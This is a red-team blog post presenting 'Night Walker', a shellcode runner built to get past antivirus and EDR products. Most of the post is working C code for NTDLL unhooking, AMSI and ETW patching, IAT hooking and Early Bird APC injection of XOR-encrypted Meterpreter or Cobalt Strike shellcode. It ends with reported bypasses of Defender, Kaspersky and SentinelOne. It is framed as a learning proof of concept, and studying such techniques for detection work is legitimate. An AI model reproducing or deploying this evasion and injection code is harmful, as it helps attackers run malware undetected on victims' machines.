Offensive Tradecraft - Night Walker :: Thomas Marques

Introduction

At the begining, all I wanted was to learn and implement a DLL unhooking technique called Perun’s Fart, originally created by SEKTOR7. I got ambitious and then I wanted to add some basic evasion techniques I learned in order to create a complete POC, ready to execute a Meterpreter or CobalStrike shellcode.

Night Walker is a project which includes various AV/EDR bypass techniques such as NTDLL unhooking, function call obfuscation, shellcode encryption, CreateThread and APC injection, IAT hooking, heap encryption, parent process id spoofing, AMSI patching, ETW patching.

I tested it against Kaspersky (premium), Defender, Defender ATP, SentinelOne, and I successfully bypassed them. I also tried to use NT APIs whenever possible.

In some cases, like SentinelOne, there were some alerts in the console.

If you would like to learn how to implement the custom GetModuleHandle and GetProcAddress I used in this POC, you can read my previous blog here or read this one from AliceCliment.

For my french friends, you can check Processus blog about AV/EDR bypass, he has a good explanation in french of most of the techniques described here and also assisted me during the development of this project.

NTDLL Unhooking - PerunsFart

As mentioned before, I heard about this technique on SEKTOR7 blog. I did some googling and I found this awesome blog from dosxuz123. He even helped me when I had some issues trying to reproduce this technique, but using Nt APIs such as NtAllocateVirtualMemory instead of Virtualalloc.

Instead of copying only the syscall stubs as he did, I copied the whole .text section. I got this idea from here. Here is the final overview of what I did.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


void perunfart(HANDLE hSusProc) {
	LPVOID pRemoteCode = NULL;// where the fresh ntdll is going to be stored
	NTSTATUS success;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;// handle to current process
	DWORD oldPro = 0;
	DWORD dllSize1 = getSizeOfImage(dllModule);
	// we allocate buffer for our dll at pRemoteCode
	SIZE_T dllSize = getSizeOfImage(dllModule);
	success = pAllocMem(hCurProc, &pRemoteCode, 0, &dllSize, MEM_COMMIT, PAGE_READWRITE);
	if (success == 0x0)
		printf("[+]\tRW buffer created for dll: %p\n", pRemoteCode);
	// read ntdll from the suspended process and copy to local process
	PULONG bytesRead = NULL;
	success = pReadMem(hSusProc, (PVOID)dllModule, pRemoteCode, dllSize1, bytesRead);
	if (success == 0x0)
		printf("[+]\tNtdll copied from suspended to local process\n");
	//TerminateProcess(hSusProc, 0);
	// we replace the hooked .text section with the clean one
	if (unhook(dllModule, pRemoteCode, oldPro))
		printf("[+]\tUnhook sucessfull :)\n");
}

First, I created a suspended process using CreateProcessA API.
Then, I retrieved and stored the size of NTDLL module in dllSize. After that, I allocated a NULL buffer with the size of NTDLL at pRemoteCode in my local process. I continued by reading NTDLL in the suspended process and copying it inside our previously allocated buffer, pRemoteCode. Now that we have the clean NTDLL in our local process, we just have to do some copy-paste. The unhook function is responsible for copying the clean .text section to the hooked one.

But in order to understand this, you need to know how to get to the .text section of a DLL module. Open PE-Bear, and load ntdll.dll. Looking at the figure below, the Sections headers is after the Optional header field of the NT headers structure.

We could manually parse the DOS header all the way down to the Section headers, but in winnt.h, there’s a macro called IMAGE_FIRST_SECTION, which help accessing the first section header in the array of section headers of a PE file. Here’s the definition of this macro:

1
2
3
4
5


#define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER)        \
   ((ULONG_PTR)(ntheader) +                                            \
    FIELD_OFFSET( IMAGE_NT_HEADERS, OptionalHeader ) +                 \
    ((ntheader))->FileHeader.SizeOfOptionalHeader   \
   ))

It essentially adds the size of the whole NT headers to the base address of the IMAGE_NT_HEADERS to get the address of the first section header.
There’s another macro in winnt.h called IMAGE_SIZEOF_SECTION_HEADER. It represents the size of each section header in a PE file, which is usefull since we are going to loop through multiple sections until we found the one we want. So, in order to get a pointer to the Section header, here’s what we are going to do:

1

IMAGE_SECTION_HEADER* cleanSectionHdr = (IMAGE_SECTION_HEADER*)((DWORD64)IMAGE_FIRST_SECTION(pNTHdr) + ((DWORD64)IMAGE_SIZEOF_SECTION_HEADER * i));

The final unhook function will look like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


BOOL unhook(HMODULE hookedDLL, LPVOID cleanDLL, DWORD protection){
	char* pBaseAddr = (char*)cleanDLL;
	DWORD64 hDLL1 = (DWORD64)hookedDLL;
	NTSTATUS success;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	DWORD old = 0;
	// get pointers to main headers/structures
	IMAGE_DOS_HEADER* pDosHdr = (IMAGE_DOS_HEADER*)pBaseAddr;
	IMAGE_NT_HEADERS* pNTHdr = (IMAGE_NT_HEADERS*)((DWORD64)pBaseAddr + pDosHdr->e_lfanew);
	int i;
	for (i = 0; i < pNTHdr->FileHeader.NumberOfSections; i++) 
	{
		IMAGE_SECTION_HEADER* cleanSectionHdr = (IMAGE_SECTION_HEADER*)((DWORD64)IMAGE_FIRST_SECTION(pNTHdr) + ((DWORD64)IMAGE_SIZEOF_SECTION_HEADER * i));
		if (!strcmp((char*)cleanSectionHdr->Name, txt)) 
		{
			// we change the protection of hooked .text section
			SIZE_T sizeOfTxtSec = sizeof(cleanSectionHdr->Misc.VirtualSize);
			LPVOID hAddr = (LPVOID)(hDLL1 + cleanSectionHdr->VirtualAddress);
			success = pVirtualProtect(hCurProc, &hAddr, (PULONG)&sizeOfTxtSec, 0x80, &protection); //we make the remote buffer RWX
			if (NT_SUCCESS(success)) {
				printf("[+]\tProtection of hooked .text section changed to rwx\n");
			}
			// we copy cleanDLL to hookedDLL
			success = pWriteMem((HANDLE)0xffffffffffffffff, hAddr, (PVOID)((DWORD64)cleanDLL + cleanSectionHdr->VirtualAddress), sizeOfTxtSec, (SIZE_T*)NULL);
			printf("[+]\tLocation of hooked .text section: %p\n", hAddr);
			if (success == 0x0)
				printf("[+]\tClean .text section copied to hooked .text sucessfully\n");
			//we restore the protection
			success = pVirtualProtect((HANDLE)0xffffffffffffffff, &hAddr, (PULONG)&sizeOfTxtSec, protection, &protection);
			if (success == 0x0)
				printf("[+]\tProtection restored\n");
		}
	}
	if (success == 0x0)
		return true;
	return false;
}

First I manually went from the DOS header to the NT headers. From there I used the IMAGE_FIRST_SECTION and IMAGE_SIZEOF_SECTION_HEADER macros to loop through the sections headers until I found one with the name .text.
After I found it, I changed the protection of the hooked .text section to RWX. Then, I copied the clean .text section to the hooked one and I finally restored the protection. We now have an unhooked NTDLL.

AMSI Patching

It’s a good idea to patch amsi within our executable if we plan to use powershell post exploitation scripts. We are going to apply a single byte patch in the AmsiScanBuffer function inside amsi.dll. by doing so, each time amsi will scan a powershell script, AmsiScanBuffer will always return false. The original code is from MrUn1k0d3r and I only modified it to use NT APIs and a custom GetProcAddress.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


void amsiPatch() {
	/* https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch/blob/main/patch-amsi-x64.c */
	NTSTATUS success;
	DWORD oldPro = 0;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	DWORD offset = 0x83;
	unsigned char patch[] = { '\x74' };
	SIZE_T sizeOfPatch = sizeof(patch);
	LPVOID ptrAm51Buff3r = hlpGetProcAddress(am51dll, am51Buff);
	printf("[+]\tLocation of AmsiScanBuffer: 0x%p\n", ptrAm51Buff3r);
	char* value = (char*)ptrAm51Buff3r;
	success = pVirtualProtect(hCurProc, &ptrAm51Buff3r, (PULONG)&sizeOfPatch, PAGE_EXECUTE_WRITECOPY, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of AmsiScanBuffer changed to wcx\n");
	}
	printf("[+]\tAmsiScanBuffer before patching: %x\n", *(value + offset));
	success = pWriteMem(hCurProc, value + offset, (PVOID)patch, 1, (SIZE_T*)NULL);
	if (NT_SUCCESS(success)) {
		printf("[+]\tPatch applied successfully\n");
		printf("[+]\tAmsiScanBuffer  after patching: %x\n", *(value + offset));
	}
	success = pVirtualProtect(hCurProc, &ptrAm51Buff3r, (PULONG)&sizeOfPatch, oldPro, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of AmsiScanBuffer restored\n");
		printf("[+]\tPatching successfull\n");
	}
}

ETW Patching - NtTraceEvent

Patching ETW events won’t do anything against kernel callbacks and mini filters, or anything working from the kernel.

Our goal here is to try to limit the events sent by our process to ETW (Event Tracing for windows).
Instead of patching EtwEventWrite, we are going to patch directly NtTraceEvent, which is the last function called from userland in regard to event registration.
The patch is simply a ret (return) instruction, 0xc3, when the function is called. Again, the original code is from MrUn1k0d3r.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


void etwPatch() {
	/* https://whiteknightlabs.com/2021/12/11/bypassing-etw-for-fun-and-profit/ */
	/* https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch/blob/main/patch-etw-x64.c */
	DWORD oldPro = 0;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	NTSTATUS success;
	unsigned char patch[] = { '\xc3'};
	SIZE_T sizeOfPatch = sizeof(patch);
	LPVOID ptrNtTraceEvent = hlpGetProcAddress(dllModule, ntTraceEvent);
	printf("[+]\tLocation of NtTraceEvent: %p\n", ptrNtTraceEvent);
	char* value = (char*)ptrNtTraceEvent;
	printf("[+]\tNtTraceEvent 3rd byte before patching: %04x\n", *(value+3));
	success = pVirtualProtect(hCurProc, &ptrNtTraceEvent, (PULONG)&sizeOfPatch, PAGE_EXECUTE_WRITECOPY, &oldPro); 
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of NtTraceEvent changed to wcx\n");
	}
	success = pWriteMem(hCurProc, value+3, (PVOID)patch, 1, (SIZE_T*)NULL);
	if (NT_SUCCESS(success)) {
		printf("[+]\tRET instruction copied successfully\n");
		printf("[+]\tNtTraceEvent 3rd byte after patching: %x\n", *(value + 3));
	}
	success = pVirtualProtect(hCurProc, &ptrNtTraceEvent, (PULONG)&sizeOfPatch, oldPro, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of NtTraceEvent restored\n");
		printf("[+]\tPatching successfull\n");
	}
}

IAT Hooking

Within a PE file, there’s an array of data structures, one per imported DLL. Each of these structures gives the name of the imported DLL and points to an array of function pointers. The array of function pointers is known as the import address table (IAT). Each imported API has its own reserved spot in the IAT where the address of the imported function is written by the Windows loader.
IAT hooking is a technique used to replaced the function pointers specified in the IAT by the address of another function we want to execute. When the IAT is hooked, the program go as follows:

The program calls CreateRemoteThread.
The program looks up the CreateRemoteThread address in the IAT.
Because the IAT has been tampered with, the CreateRemoteThread address in the IAT is pointing to a rogue HookedCreateRemThr function.
The program jumps to the HookedCreateRemThr retrieved in step 3.
HookedCreateRemThr intercepts the CreateRemoteThread parameters and executes some malicous code.
HookedCreateRemThr calls the legitimate kernel32!CreateRemoteThread routine. (I cheated and ended up calling NtCreateThreadEx instead :)

In order to successfully apply our hook inside the IAT, we first need to know how to access the Import Address Table with C/C++.
Open again Pe-Bear, but this time load calc.exe. Hover your mouse where it says imports and you’ll see that it says Data Directory[1]: Imports. This just means that the imports come from the Data Directory array at index 1. The Data Directory is an array of data structures located in the PE file’s Optional Header.
pe_bear

There’s is a WinAPI function called ImageDirectoryEntryToDataExthat helps us retrieve the address of a directory entry. We just have to pass the base address of our current program, and the directory entry index we wish to retrieve, which in our case is 1, the IAT.

1
2
3
4
5
6
7
8
9


// get a HANDLE to a main module == BaseImage
	HANDLE baseAddress = GetModuleHandle(NULL);
	// get Import Table of main module
	PIMAGE_IMPORT_DESCRIPTOR importTbl = (PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToDataEx(
		baseAddress,
		TRUE,
		IMAGE_DIRECTORY_ENTRY_IMPORT,
		&size,
		NULL);	

Once we are in the import table, a nice trick from SEKTOR7 is to use the original function address as a reference to search directly inside the IAT.
pe_bear

PIMAGE_THUNK_DATA represents a pointer to an entry in the First Thunk. The definition of PIMAGE_THUNK_DATA in winnt.h is as follows:

1
2
3
4
5
6
7
8
9


typedef struct _IMAGE_THUNK_DATA64 {
    union {
        ULONGLONG ForwarderString;  // PBYTE 
        ULONGLONG Function;         // PDWORD
        ULONGLONG Ordinal;
        ULONGLONG AddressOfData;    // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA64;
typedef IMAGE_THUNK_DATA64 * PIMAGE_THUNK_DATA64;

The u1 union is used to represent different types of data that can be stored in the First Thunk. Since we are using the original function address as a reference, we are interested in u1.function because it holds the memory addres of the function we are looking for. Here is the final code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46


BOOL Hookem(char* dll, char* origFunc, PROC hookingFunc) {
	ULONG size;
	DWORD i;
	BOOL found = FALSE;
	// get a HANDLE to a main module == BaseImage
	HANDLE baseAddress = GetModuleHandle(NULL);
	// get Import Table of main module
	PIMAGE_IMPORT_DESCRIPTOR importTbl = (PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToDataEx(
		baseAddress,
		TRUE,
		IMAGE_DIRECTORY_ENTRY_IMPORT,
		&size,
		NULL);
	// find imports for target dll 
	for (i = 0; i < size; i++) {
		char* importName = (char*)((PBYTE)baseAddress + importTbl[i].Name);
		if (_stricmp(importName, dll) == 0) {
			found = TRUE;
			break;
		}
	}
	if (!found)
		return FALSE;
	// Optimization: get original address of function to hook 
	// and use it as a reference when searching through IAT directly
	PROC origFuncAddr = (PROC)GetProcAddress(hlpGetModuleHandle(k3rn3l), origFunc);
	// Search IAT
	PIMAGE_THUNK_DATA thunk = (PIMAGE_THUNK_DATA)((PBYTE)baseAddress + importTbl[i].FirstThunk);
	while (thunk->u1.Function) {
		PROC* currentFuncAddr = (PROC*)&thunk->u1.Function;
		// found
		if (*currentFuncAddr == origFuncAddr) {
			// make sure memory is writable
			DWORD oldProtect = 0;
			VirtualProtect((LPVOID)currentFuncAddr, 4096, PAGE_READWRITE, &oldProtect);
			// set the hook
			*currentFuncAddr = (PROC)hookingFunc;
			// revert protection setting back
			VirtualProtect((LPVOID)currentFuncAddr, 4096, oldProtect, &oldProtect);
			printf("[+]\tIAT function %s() hooked!\n", origFunc);
			return TRUE;
		}
		thunk++;
	}
	return FALSE;
}

Earlybird Injection

OPSEC: In an environment with Microsoft Defender for Endpoint, my payload executed successfully, but there was a medium alert regarding the fact I queued a user APC. Probably a kernel notification when a program uses QueueUserAPC function.

The main advantage of this technique is that our shellcode get executed by the main thread of a suspended program, which meand EDR didn’t have time to hook it yet. Here’s a high level overview of the technique:

Create a program in suspended state.
Allocate memory for our shellcode inside the suspended program.
We copy our shellcode to the buffer
We queue a user APC pointing to our shellcode memory inside suspended progam.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


void earlybird(PROCESS_INFORMATION pi) {
	DWORD old = 0;
	DWORD fail = (DWORD)-1;
	NTSTATUS success;
	LPVOID pRemoteCode = NULL;
	SIZE_T payload_len = sizeof(payload);
	SIZE_T payload_len2 = sizeof(payload);
	success = pAllocMem(pi.hProcess, &pRemoteCode, 0, &payload_len, MEM_COMMIT, PAGE_READWRITE); // we allocate buffer for our payload
	if (NT_SUCCESS(success)) {
		printf("[+]\tRW buffer created in suspended process: %p\n", pRemoteCode);
	}
	XOR((char*)payload, payload_len2, (char*)key, sizeof(key));
	success = pWriteMem(pi.hProcess, pRemoteCode, (PVOID)payload, payload_len, (SIZE_T*)NULL); //we copy our payload to the buffer
	if (NT_SUCCESS(success)) {
		printf("[+]\tPayload successfully copied to suspended process\n");
	}
	success = pVirtualProtect(pi.hProcess, &pRemoteCode, (PULONG)&payload_len, PAGE_EXECUTE_READ, &old); //we make the remote buffer RX
	if (NT_SUCCESS(success)) {
		printf("[+]\tRemote buffer marked as RX\n");
	}
	if (pQueueUserAPC((PAPCFUNC)pRemoteCode, pi.hThread, NULL) != 0)
		printf("[+]\tUser APC queued successfully\n");
	if (ResumeThread(pi.hThread) != fail);
	printf("[+]\tThread resumed :)\n");
}

Heap Encryption while sleeping

This is mainly for CobalStrike shellcode. the idea here is to encrypt the heap which contains CS configuration while we are sleeping.
Please refer to the original blog which explains everything in depth

Results

Let see how this basic shellcode runner performed against AV and EDR.

Defender

Completely bypassed using Earlybird or a combination of CreateRemoteThread + IAT hooking.

Kaspersky (Premium)

Completely bypassed using a combination of CreateRemoteThread + IAT hooking. Earlybird didn’t work here.

Defender ATP

Completely bypassed using Earlybird.

Defender for Endpoint (MDE)

The shellcode is excuted and keep running, but there’s an alert regarding the usage of QueueUserAPC function.

SentinelOne

The program get blocked if we try to patch ETW, but when we remove the ETW patching, it gets executed successfully.
The shellcode is executed and keeps running, but there’s the following alert:
pe_bear

Conclusion

This is a shellcode runner I developpped to learn more about PerunsFart technique, but ended up adding more functionality.
It enhanced my knowledge about windows API, malware development, debugging and C pointers.

An evolution from this is to look at techniques such as Indirect syscall with dynamic syscall ID and try to implement them. Also, retrieving the shellcode from a remote server instead of hardcoding it inside our program should be fun to implement. Using Systemfunction033 for shelcode encryption and decryption is also better opsec. All of these already have a public poc out there so do your research and have fun.

Mentions

People you need to follow who are doing an amazing job.

Processus - Also assisted me and helped with the testing and development in this project.
dosxuz123 - Helped me with some issues I had.
AliceCliment - Check her amazing latest blog here.
TheD1rkMtr - He’s constantly releasing really cool projects about malware dev.

Offensive Tradecraft - Night Walker